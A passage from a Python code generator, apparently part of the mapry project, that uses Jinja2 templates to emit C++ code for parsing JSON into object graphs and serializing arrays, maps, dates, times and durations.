{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string({{ value }}.size())));
{% endif %}{# /if minimum_size is not none #}
{% if maximum_size is not none %}
} else if ({{ value }}.size() > {{ maximum_size }}) {
constexpr auto expected_but_got(
"Expected an array of maximum size "
{{ "%d"|format(maximum_size)|escaped_str }}
", but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
std::to_string({{ value }}.size())));
{% endif %}{# /if maximum_size is not none #}
} else {
{{ set_target|indent }}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_array(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Array, registry_exprs: Mapping[mapry.Class, str],
        auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse an array.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param registry_exprs:
        map class to C++ expression of the registry of the class instances
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    """
    uid = auto_id.next_identifier()

    # Reference path of an item: <array ref>/<index>
    item_ref_parts = ref_parts + [
        '"/"', 'std::to_string(i_{uid})'.format(uid=uid)
    ]

    # Code that parses a single array item into the pre-sized target
    item_parsing = _parse_value(
        value_expr="item_{uid}".format(uid=uid),
        target_expr="target_{uid}.at(i_{uid})".format(uid=uid),
        ref_parts=item_ref_parts,
        a_type=a_type.values,
        registry_exprs=registry_exprs,
        auto_id=auto_id,
        cpp=cpp)

    return _PARSE_ARRAY_TPL.render(
        uid=uid,
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        minimum_size=a_type.minimum_size,
        maximum_size=a_type.maximum_size,
        target_cpp_type=mapry.cpp.generate.type_repr(a_type=a_type, cpp=cpp),
        item_parsing=item_parsing)
_PARSE_MAP_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
{{ target_cpp_type }}& target_{{ uid }} = {{ target_expr }};
for (Json::ValueConstIterator it_{{ uid }} = {{ value }}.begin(); {#
#}it_{{ uid }} != {{ value }}.end(); {#
#}++it_{{ uid }}) {
{{ item_parsing|indent|indent }}
if (errors->full()) {
break;
}
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_map(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Map, registry_exprs: Mapping[mapry.Class, str],
        auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse a map.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param registry_exprs:
        map class to C++ expression of the registry of the class instances
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    """
    uid = auto_id.next_identifier()

    # Reference path of an entry: <map ref>/<key>
    entry_ref_parts = ref_parts + ['"/"', 'it_{uid}.name()'.format(uid=uid)]

    # Code that parses a single map entry into the target map
    entry_parsing = _parse_value(
        value_expr="*it_{uid}".format(uid=uid),
        target_expr="target_{uid}[it_{uid}.name()]".format(uid=uid),
        ref_parts=entry_ref_parts,
        a_type=a_type.values,
        registry_exprs=registry_exprs,
        auto_id=auto_id,
        cpp=cpp)

    return _PARSE_MAP_TPL.render(
        uid=uid,
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        target_cpp_type=mapry.cpp.generate.type_repr(a_type=a_type, cpp=cpp),
        item_parsing=entry_parsing)
_PARSE_CLASS_REF_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
if (!{{ value }}.isString()) {
constexpr auto expected_but_got(
"Expected a string, but got: ");
errors->add(
{{ ref_parts|join_strings|indent|indent }},
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
{{ value }}.type())));
} else {
const std::string& cast_{{ uid }} = {{ value }}.asString();
if ({{ registry_expr }}.count(cast_{{ uid }}) == 0) {
constexpr auto reference_not_found(
"Reference to an instance of class "
{{ class_name|escaped_str }}
" not found: ");
errors->add(
{{ ref_parts|join_strings|indent|indent|indent }},
message(
reference_not_found,
strlen(reference_not_found),
cast_{{ uid }}));
} else {
{{ target_expr }} = {{ registry_expr }}.at(cast_{{ uid }}).get();
}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_instance_reference(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Class, registry_expr: str, auto_id: _AutoID) -> str:
    """
    Generate the code to parse a reference to an instance of a class.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param registry_expr:
        C++ expression of the registry of the class instances
    :param auto_id: generator of unique identifiers
    :return: generated code
    """
    # The reference is looked up in the registry of pre-allocated
    # instances; a missing key is reported as a parse error.
    return _PARSE_CLASS_REF_TPL.render(
        uid=auto_id.next_identifier(),
        class_name=a_type.name,
        registry_expr=registry_expr,
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts)
_PARSE_EMBED_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
{% if value_expr|is_variable %}
{# Short-circuit value as value expression if it is a variable so that
we don't end up with an unnecessary variable1 = variable2 statement.#}
{% set value = value_expr %}
{% else %}
{% set value = "value_%s"|format(uid) %}
const Json::Value& value_{{ uid }} = {{ value_expr }};
{% endif %}
{{ embed_name|as_variable }}_from(
{{ value }},
{% for registry_expr in selected_registry_exprs %}
{{ registry_expr }},
{% endfor %}
{{ ref_parts|join_strings|indent }},
&{{ target_expr }},
errors);''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_embed(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Embed, registry_exprs: Mapping[mapry.Class, str],
        auto_id: _AutoID) -> str:
    """
    Generate the code to parse an embeddable structure.

    The code parses the ``value_expr`` into the ``target_expr``.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry definition of the value type
    :param registry_exprs:
        map class to C++ expression of the registry of the class instances
    :param auto_id: generator of unique identifiers
    :return: generated code
    """
    uid = auto_id.next_identifier()

    # Only forward the registries of the classes that the embeddable
    # structure actually references.
    forwarded_registries = [
        registry_exprs[ref_cls]
        for ref_cls in mapry.references(a_type=a_type)
    ]

    return _PARSE_EMBED_TPL.render(
        uid=uid,
        embed_name=a_type.name,
        value_expr=value_expr,
        target_expr=target_expr,
        ref_parts=ref_parts,
        selected_registry_exprs=forwarded_registries)
@ensure(lambda result: not result.endswith('\n'))
def _parse_value(
        value_expr: str, target_expr: str, ref_parts: List[str],
        a_type: mapry.Type, registry_exprs: Mapping[mapry.Class, str],
        auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse the ``value_expr`` into the ``target_expr``.

    Dispatches on the concrete mapry type to the corresponding
    ``_parse_*`` generator.

    :param value_expr: C++ expression of the JSON value
    :param target_expr: C++ expression of where to store the parsed value
    :param ref_parts: C++ expression of reference path segments to the value
    :param a_type: mapry type of the value
    :param registry_exprs:
        map class to C++ expression of the registry of the class instances
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    :raise: NotImplementedError on an unhandled mapry type
    """
    # pylint: disable=too-many-branches
    if isinstance(a_type, mapry.Boolean):
        body = _parse_boolean(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            auto_id=auto_id)

    elif isinstance(a_type, mapry.Integer):
        body = _parse_integer(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id)

    elif isinstance(a_type, mapry.Float):
        body = _parse_float(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id)

    elif isinstance(a_type, mapry.String):
        body = _parse_string(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id)

    elif isinstance(a_type, mapry.Path):
        body = _parse_path(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    # Date/datetime/time/time-zone parsing depends on cpp.datetime_library.
    elif isinstance(a_type, mapry.Date):
        body = _parse_date(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    elif isinstance(a_type, mapry.Datetime):
        body = _parse_date_time(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    elif isinstance(a_type, mapry.Time):
        body = _parse_time(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    elif isinstance(a_type, mapry.TimeZone):
        body = _parse_time_zone(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id,
            cpp=cpp)

    elif isinstance(a_type, mapry.Duration):
        body = _parse_duration(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            auto_id=auto_id)

    # Containers recurse into _parse_value for their item/value types.
    elif isinstance(a_type, mapry.Array):
        body = _parse_array(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            registry_exprs=registry_exprs,
            auto_id=auto_id,
            cpp=cpp)

    elif isinstance(a_type, mapry.Map):
        body = _parse_map(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            registry_exprs=registry_exprs,
            auto_id=auto_id,
            cpp=cpp)

    elif isinstance(a_type, mapry.Class):
        # A class value is a reference into the instance registry which
        # must have been supplied by the caller.
        assert a_type in registry_exprs, \
            ('Missing registry expression for class {} (ref: {}); '
             'available registry expressions: {}').format(
                a_type.name, a_type.ref,
                [cls.name for cls in registry_exprs.keys()])

        body = _parse_instance_reference(
            value_expr=value_expr,
            target_expr=target_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            registry_expr=registry_exprs[a_type],
            auto_id=auto_id)

    elif isinstance(a_type, mapry.Embed):
        body = _parse_embed(
            target_expr=target_expr,
            value_expr=value_expr,
            ref_parts=ref_parts,
            a_type=a_type,
            registry_exprs=registry_exprs,
            auto_id=auto_id)

    else:
        raise NotImplementedError(
            "Unhandled parsing of type: {}".format(a_type))

    return body
_PARSE_PROPERTY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{# Assume `errors` is defined to collect errors. #}
////
// Parse {{ a_property.name|as_field }}
////
{% if not a_property.optional %}
if (!{{value_obj_expr}}.isMember({{a_property.json|escaped_str}})) {
errors->add(
{{ ref_obj_parts|join_strings|indent|indent }},
{{ "Property is missing: %s"|format(a_property.json)|escaped_str }});
} else {
{{ parsing|indent }}
}
{% else %}
if ({{value_obj_expr}}.isMember({{a_property.json|escaped_str}})) {
{% if needs_emplace %}
{{ property_target_expr }}.emplace();
{% endif %}{# /if needs_emplace #}
{{ parsing|indent }}
}
{% endif %}{# /if not a_property.optional #}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_property(
        target_obj_expr: str, value_obj_expr: str, ref_obj_parts: List[str],
        a_property: mapry.Property, registry_exprs: Mapping[mapry.Class, str],
        auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to parse a property of a composite from a JSON object.

    :param target_obj_expr:
        C++ expression of the object to store the properties
    :param value_obj_expr: C++ expression of the JSON object
    :param ref_obj_parts:
        C++ expression of the reference path segments to the object
    :param a_property: mapry definition of the property
    :param registry_exprs:
        map class to C++ expression of the registry of the class instances
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated code
    """
    json_key = mapry.cpp.generate.escaped_str(a_property.json)

    target = "{}->{}".format(
        target_obj_expr,
        mapry.cpp.naming.as_field(identifier=a_property.name))

    # Optional containers and embeds are wrapped in an optional; they must
    # be emplaced before parsing and dereferenced when parsed into.
    needs_emplace = isinstance(
        a_property.type, (mapry.Array, mapry.Map, mapry.Embed))

    if a_property.optional and isinstance(
            a_property.type, (mapry.Array, mapry.Map)):
        deref_target = "*{}".format(target)
    elif a_property.optional and isinstance(a_property.type, mapry.Embed):
        deref_target = "(*{})".format(target)
    else:
        deref_target = target

    parsing = _parse_value(
        value_expr="{}[{}]".format(value_obj_expr, json_key),
        target_expr=deref_target,
        ref_parts=ref_obj_parts + [
            mapry.cpp.generate.escaped_str("/" + a_property.json)
        ],
        a_type=a_property.type,
        registry_exprs=registry_exprs,
        auto_id=auto_id,
        cpp=cpp)

    rendered = _PARSE_PROPERTY_TPL.render(
        a_property=a_property,
        value_obj_expr=value_obj_expr,
        ref_obj_parts=ref_obj_parts,
        parsing=parsing,
        property_target_expr=target,
        needs_emplace=needs_emplace)

    return rendered.rstrip("\n")
_PARSE_COMPOSITE_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
void {{ composite.name|as_variable }}_from(
const Json::Value& value,
{% for ref_cls in references %}
const std::map<std::string, std::unique_ptr<{{
ref_cls.name|as_composite }}>>& {{
ref_cls.plural|as_variable }}_registry,
{% endfor %}
std::string ref,
{{ composite.name|as_composite }}* target,
parse::Errors* errors) {
if (!value.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
ref,
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
value.type())));
return;
}
{% for prop in composite.properties.values() %}
{{ property_parsing[prop]|indent }}
if (errors->full()) {
return;
}
{% endfor %}{# /for prop in composite.properties.values() #}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_composite(
        composite: Union[mapry.Class, mapry.Embed], cpp: mapry.Cpp) -> str:
    """
    Generate the code of the function that parses a composite.

    :param composite: mapry definition of the composite
    :param cpp: C++ settings
    :return: generated code
    """
    references = mapry.references(a_type=composite)

    # Registries are passed in as function parameters named
    # <plural>_registry.
    registry_exprs = dict()
    for ref_cls in references:
        registry_exprs[ref_cls] = '{}_registry'.format(
            mapry.cpp.naming.as_variable(ref_cls.plural))

    auto_id = _AutoID()

    # Map property -> code parsing it from the JSON object
    property_parsing = dict()
    for prop in composite.properties.values():
        property_parsing[prop] = _parse_property(
            target_obj_expr="target",
            value_obj_expr="value",
            ref_obj_parts=["ref"],
            a_property=prop,
            registry_exprs=registry_exprs,
            auto_id=auto_id,
            cpp=cpp)

    return _PARSE_COMPOSITE_TPL.render(
        composite=composite,
        references=references,
        property_parsing=property_parsing)
_PARSE_GRAPH_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
void {{ graph.name|as_variable }}_from(
const Json::Value& value,
std::string ref,
{{ graph.name|as_composite }}* target,
parse::Errors* errors) {
if (errors == nullptr) {
throw std::invalid_argument("Unexpected null errors");
}
if (!errors->empty()) {
throw std::invalid_argument("Unexpected non-empty errors");
}
if (!value.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
ref,
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
value.type())));
return;
}
{% for cls in graph.classes.values() %}
////
// Pre-allocate {{ cls.plural|as_field }}
////
std::string {{ cls.plural|as_variable }}_ref;
{{ cls.plural|as_variable }}_ref.reserve(ref.size() + {{
"/%s"|format(cls.plural|json_plural)|length }});
{{ cls.plural|as_variable }}_ref += ref;
{{ cls.plural|as_variable }}_ref += {{
"/%s"|format(cls.plural|json_plural)|escaped_str }};
if (value.isMember({{ cls.plural|json_plural|escaped_str }})) {
const Json::Value& obj = value[{{
cls.plural|json_plural|escaped_str }}];
if (!obj.isObject()) {
constexpr auto expected_but_got(
"Expected an object, but got: ");
errors->add(
{{ cls.plural|as_variable }}_ref,
message(
expected_but_got,
strlen(expected_but_got),
value_type_to_string(
obj.type())));
} else {
for (Json::ValueConstIterator it = obj.begin();
it != obj.end(); ++it) {
{% set set_instance %}
auto instance = std::make_unique<{{ cls.name|as_composite }}>();
instance->id = it.name();
target->{{
cls.plural|as_field }}[it.name()] = std::move(instance);
{% endset %}
{% if cls.id_pattern is not none %}
if (!std::regex_match(
it.name(),
{{ cls.name|as_variable }}_re::kID)) {
constexpr auto expected_but_got(
"Expected ID to match "
{{ cls.id_pattern.pattern|escaped_str }}
", but got: ");
errors->add(
{{ cls.plural|as_variable }}_ref,
message(
expected_but_got,
strlen(expected_but_got),
it.name()));
if (errors->full()) {
break;
}
} else {
{{ set_instance|indent }}
}
{% else %}
{{ set_instance }}
{% endif %}{# /if cls.id_pattern is not none #}
}
}
}
{% endfor %}
{% if graph.classes %}
// Pre-allocating class instances is critical.
// If the pre-allocation failed, we can not continue to parse the instances.
if (!errors->empty()) {
return;
}
// Keep the prefix fixed in this buffer so that
// it is copied as little as possible
std::string instance_ref;
{% endif %}
{% for cls in graph.classes.values() %}
////
// Parse {{ cls.plural|as_field }}
////
// clear() does not shrink the reserved memory,
// see https://en.cppreference.com/w/cpp/string/basic_string/clear
instance_ref.clear();
instance_ref += {{ cls.plural|as_variable }}_ref;
instance_ref += '/';
if (value.isMember({{ cls.plural|json_plural|escaped_str }})) {
const Json::Value& obj = value[{{
cls.plural|json_plural|escaped_str }}];
for (Json::ValueConstIterator it = obj.begin(); it != obj.end(); ++it) {
instance_ref.reserve(
{{ cls.plural|as_variable }}_ref.size() + 1 + it.name().size());
instance_ref.resize(
{{ cls.plural|as_variable }}_ref.size() + 1);
instance_ref.append(
it.name());
{{ cls.name|as_composite }}* instance(
target->{{ cls.plural|as_field }}.at(it.name()).get());
{{ cls.name|as_variable }}_from(
*it,
{% for ref_cls in references[cls] %}
target->{{ ref_cls.plural|as_field }},
{% endfor %}
instance_ref,
instance,
errors);
if (errors->full()) {
break;
}
}
}
if (errors->full()) {
return;
}
{% endfor %}
{% for property_parsing in property_parsings %}
{{ property_parsing|indent }}
if (errors->full()) {
return;
}
{% endfor %}
}''')
@ensure(lambda result: not result.endswith('\n'))
def _parse_graph(graph: mapry.Graph, cpp: mapry.Cpp) -> str:
    """
    Generate the code that parses an object graph.

    :param graph: definition of the object graph
    :param cpp: C++ settings
    :return: generated code
    """
    # Map mapry class -> referenced mapry classes
    references = {
        cls: mapry.references(a_type=cls)
        for cls in graph.classes.values()
    }

    # Map mapry class -> C++ expression of the instance registry
    registry_exprs = {
        cls: 'target->{}'.format(
            mapry.cpp.naming.as_field(identifier=cls.plural))
        for cls in graph.classes.values()
    }

    # Gather property parsings in a list so that they can be readily
    # inserted in the template
    auto_id = _AutoID()
    property_parsings = [
        _parse_property(
            target_obj_expr="target",
            value_obj_expr="value",
            ref_obj_parts=['ref'],
            a_property=prop,
            registry_exprs=registry_exprs,
            auto_id=auto_id,
            cpp=cpp)
        for prop in graph.properties.values()
    ]

    text = _PARSE_GRAPH_TPL.render(
        graph=graph, references=references, property_parsings=property_parsings)

    assert isinstance(text, str)
    return text.rstrip("\n")
@ensure(lambda result: not result.endswith('\n'))
def _datetime_to_string() -> str:
    """
    Generate the code of a function that translates the date/time to a string.

    :return: generated code
    """
    # NOTE: the snippet below is returned verbatim (no str.format() is
    # applied), so C++ braces must be single braces. The previous version
    # mixed left-over ``{{``/``}}`` format-escapes with single braces,
    # which emitted invalid C++. It also re-declared ``int len`` inside
    # the while-loop, shadowing the variable tested by the loop condition
    # and thus never terminating when the first strftime() returned 0.
    return textwrap.dedent(
        '''\
        /**
         * serializes the date/time/datetime to a string.
         *
         * @param[in] t time structure
         * @param[in] fmt format
         * @return time structure serialized to a string according to the format
         */
        std::string tm_to_string(const struct tm& t, const char* fmt) {
            if(fmt == nullptr or fmt[0] == '\\0') {
                return "";
            }
            const size_t fmt_size = strlen(fmt);
            std::string buf;
            buf.resize(fmt_size * 4);
            int len = strftime(&buf[0], buf.size(), fmt, &t);
            while(len == 0) {
                buf.resize(buf.size() * 2);
                len = strftime(&buf[0], buf.size(), fmt, &t);
            }
            buf.resize(len);
            return buf;
        }''')
@ensure(lambda result: not result.endswith('\n'))
def _duration_to_string() -> str:
    """
    Generate the code for serializing durations to strings.

    The emitted C++ function renders std::chrono::nanoseconds as an
    ISO 8601 duration (e.g., "P1DT2H3M4.5S").

    :return: generated code
    """
    # NOTE(review): in the emitted C++, the trailing-zero trimming loop
    # iterates with ``size_t i`` under the condition ``i >= 0``, which is
    # always true for an unsigned type; the loop only terminates via the
    # ``break``. That is reached here because this branch requires
    # nanoseconds != 0, so nanos_str contains a non-'0' digit, but the
    # comparison is tautological -- confirm and consider a signed index
    # when touching this snippet.
    return textwrap.dedent(
        '''\
        /**
         * serializes the duration to a string.
         *
         * @param[in] d duration to be serialized
         * @return duration as string
         */
        std::string duration_to_string(const std::chrono::nanoseconds& d) {
            typedef std::chrono::nanoseconds::rep rep_t;
            const rep_t abscount = (d.count() < 0) ? -d.count() : d.count();
            if (abscount < 0) {
                std::stringstream sserr;
                sserr
                    << "Computing the absolute number of nanoseconds "
                        "in the duration underflowed: "
                    << d.count();
                throw std::overflow_error(sserr.str());
            }
            const rep_t nanoseconds_in_day = 86400L*1000L*1000L*1000L;
            const rep_t days = abscount / nanoseconds_in_day;
            rep_t rest = abscount % nanoseconds_in_day;
            const rep_t nanoseconds_in_hour = 3600L*1000L*1000L*1000L;
            const rep_t hours = rest / nanoseconds_in_hour;
            rest = rest % nanoseconds_in_hour;
            const rep_t nanoseconds_in_minute = 60L*1000L*1000L*1000L;
            const rep_t minutes = rest / nanoseconds_in_minute;
            rest = rest % nanoseconds_in_minute;
            const rep_t nanoseconds_in_second = 1000L*1000L*1000L;
            const rep_t seconds = rest / nanoseconds_in_second;
            rest = rest % nanoseconds_in_second;
            const rep_t nanoseconds = rest;
            std::stringstream ss;
            if (d.count() < 0) {
                ss << "-";
            }
            ss << "P";
            if(days > 0) {
                ss << days << "D";
            }
            if(hours > 0 or minutes > 0 or
                    seconds > 0 or nanoseconds > 0) {
                ss << "T";
                if(hours > 0) {
                    ss << hours << "H";
                }
                if(minutes > 0) {
                    ss << minutes << "M";
                }
                if(nanoseconds == 0) {
                    if(seconds > 0) {
                        ss << seconds << "S";
                    }
                } else {
                    std::stringstream ssnano;
                    ssnano << std::setfill('0') << std::setw(9) << nanoseconds;
                    const std::string nanos_str = ssnano.str();
                    // Nag trailing zeros
                    size_t i = nanos_str.size() - 1;
                    for(; i >= 0; --i) {
                        if (nanos_str.at(i) != '0') {
                            break;
                        }
                    }
                    ss << seconds << "." << nanos_str.substr(0, i + 1) << "S";
                }
            }
            return ss.str();
        }''')
_SERIALIZE_CTIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{% if dt_format %}
{{ target_expr }} = tm_to_string(
{{ value_expr }},
{{ dt_format|escaped_str }});
{% else %}
{{ target_expr }} = "";
{% endif %}{# /if dt_format #}
''')
_SERIALIZE_DATE_TIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
'''\
{% if dt_format %}
{{ target_expr }} = date::format(
{{ dt_format|escaped_str }},
{{ value_expr }});
{% else %}
{{ target_expr }} = "";
{% endif %}{# /if dt_format #}
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_date_time(
        target_expr: str, value_expr: str,
        a_type: Union[mapry.Date, mapry.Datetime], cpp: mapry.Cpp) -> str:
    """
    Generate the code that serializes a date or a datetime.

    The generated code writes ``value_expr`` into ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param a_type: the mapry type of the value
    :param cpp: C++ settings
    :return: generated serialization code
    """
    # Pick the template corresponding to the configured datetime library
    # and render it with the common set of arguments.
    if cpp.datetime_library == 'ctime':
        template = _SERIALIZE_CTIME_TPL
    elif cpp.datetime_library == 'date.h':
        template = _SERIALIZE_DATE_TIME_TPL
    else:
        raise NotImplementedError(
            "Unhandled datetime library: {}".format(cpp.datetime_library))

    return template.render(
        value_expr=value_expr,
        target_expr=target_expr,
        dt_format=a_type.format).rstrip()
# Jinja2 template: serialize a time of day with date.h by formatting the
# value's ``to_duration()``; when no format is given, the target is set to "".
_SERIALIZE_TIME_TPL = mapry.cpp.jinja2_env.ENV.from_string(
    '''\
{% if dt_format %}
{{ target_expr }} = date::format(
{{ dt_format|escaped_str }},
{{ value_expr }}.to_duration());
{% else %}
{{ target_expr }} = "";
{% endif %}{# /if dt_format #}
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_time(
        target_expr: str, value_expr: str, a_type: mapry.Time,
        cpp: mapry.Cpp) -> str:
    """
    Generate the code to serialize a time of day.

    The code serializes the ``value_expr`` into the ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param a_type: the mapry type of the value
    :param cpp: C++ settings
    :return: generated serialization code
    """
    if cpp.datetime_library == 'ctime':
        return _SERIALIZE_CTIME_TPL.render(
            value_expr=value_expr,
            target_expr=target_expr,
            dt_format=a_type.format).rstrip()

    if cpp.datetime_library == 'date.h':
        # date.h times need a dedicated template since the value must be
        # converted with to_duration() before formatting.
        return _SERIALIZE_TIME_TPL.render(
            value_expr=value_expr,
            target_expr=target_expr,
            dt_format=a_type.format).rstrip()

    raise NotImplementedError(
        "Unhandled datetime library: {}".format(cpp.datetime_library))
@ensure(lambda result: not result.endswith('\n'))
def _serialize_time_zone(
        target_expr: str, value_expr: str, cpp: mapry.Cpp) -> str:
    """
    Generate the code to serialize a time zone.

    The generated code writes ``value_expr`` into ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param cpp: C++ settings
    :return: generated serialization code
    """
    # Map each supported datetime library to the assignment pattern;
    # with date.h the value is a pointer whose name() yields the zone ID.
    patterns = {
        'ctime': '{target} = {value};',
        'date.h': '{target} = {value}->name();'}

    pattern = patterns.get(cpp.datetime_library)
    if pattern is None:
        raise NotImplementedError(
            "Unhandled datetime library: {}".format(cpp.datetime_library))

    return pattern.format(target=target_expr, value=value_expr)
# Jinja2 template: serialize a vector into a Json::Value array by looping
# over the items; ``uid`` keeps the loop variables unique across nestings.
_SERIALIZE_ARRAY_TPL = mapry.cpp.jinja2_env.ENV.from_string(
    '''\
Json::Value target_{{ uid }}(Json::arrayValue);
const auto& vector_{{ uid }} = {{ value_expr }};
for (int i_{{ uid }} = 0;
i_{{ uid }} < vector_{{ uid }}.size();
++i_{{ uid }}) {
{{ item_serialization|indent }}
}
{{ target_expr }} = std::move(target_{{ uid }});
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_array(
        target_expr: str, value_expr: str, a_type: mapry.Array,
        auto_id: _AutoID, cpp: mapry.Cpp) -> str:
    """
    Generate the code to serialize an array.

    The generated code writes ``value_expr`` into ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param a_type: the mapry type of the value
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated serialization code
    """
    uid = auto_id.next_identifier()

    # C++ expressions for the item inside the generated loop body
    item_target = "target_{0}[i_{0}]".format(uid)
    item_source = "vector_{0}[i_{0}]".format(uid)

    item_serialization = _serialize_value(
        target_expr=item_target,
        value_expr=item_source,
        a_type=a_type.values,
        auto_id=auto_id,
        cpp=cpp)

    return _SERIALIZE_ARRAY_TPL.render(
        uid=uid,
        value_expr=value_expr,
        item_serialization=item_serialization,
        target_expr=target_expr)
# Jinja2 template: serialize a map into a Json::Value object by iterating
# the key/value pairs; ``uid`` keeps the loop variables unique across
# nestings.
_SERIALIZE_MAP_TPL = mapry.cpp.jinja2_env.ENV.from_string(
    '''\
Json::Value target_{{ uid }}(Json::objectValue);
const auto& map_{{ uid }} = {{ value_expr }};
for (const auto& kv_{{ uid }} : map_{{ uid }}) {
{{ item_serialization|indent }}
}
{{ target_expr }} = std::move(target_{{ uid }});
''')
@ensure(lambda result: not result.endswith('\n'))
def _serialize_map(
        target_expr: str, value_expr: str, a_type: mapry.Map, auto_id: _AutoID,
        cpp: mapry.Cpp) -> str:
    """
    Generate the code to serialize a map.

    The generated code writes ``value_expr`` into ``target_expr``.

    :param target_expr: C++ expression of the Json::Value to be set
    :param value_expr: C++ expression of the value to be serialized
    :param a_type: the mapry type of the value
    :param auto_id: generator of unique identifiers
    :param cpp: C++ settings
    :return: generated serialization code
    """
    uid = auto_id.next_identifier()

    # C++ expressions for the entry inside the generated loop body
    entry_target = "target_{0}[kv_{0}.first]".format(uid)
    entry_source = "kv_{0}.second".format(uid)

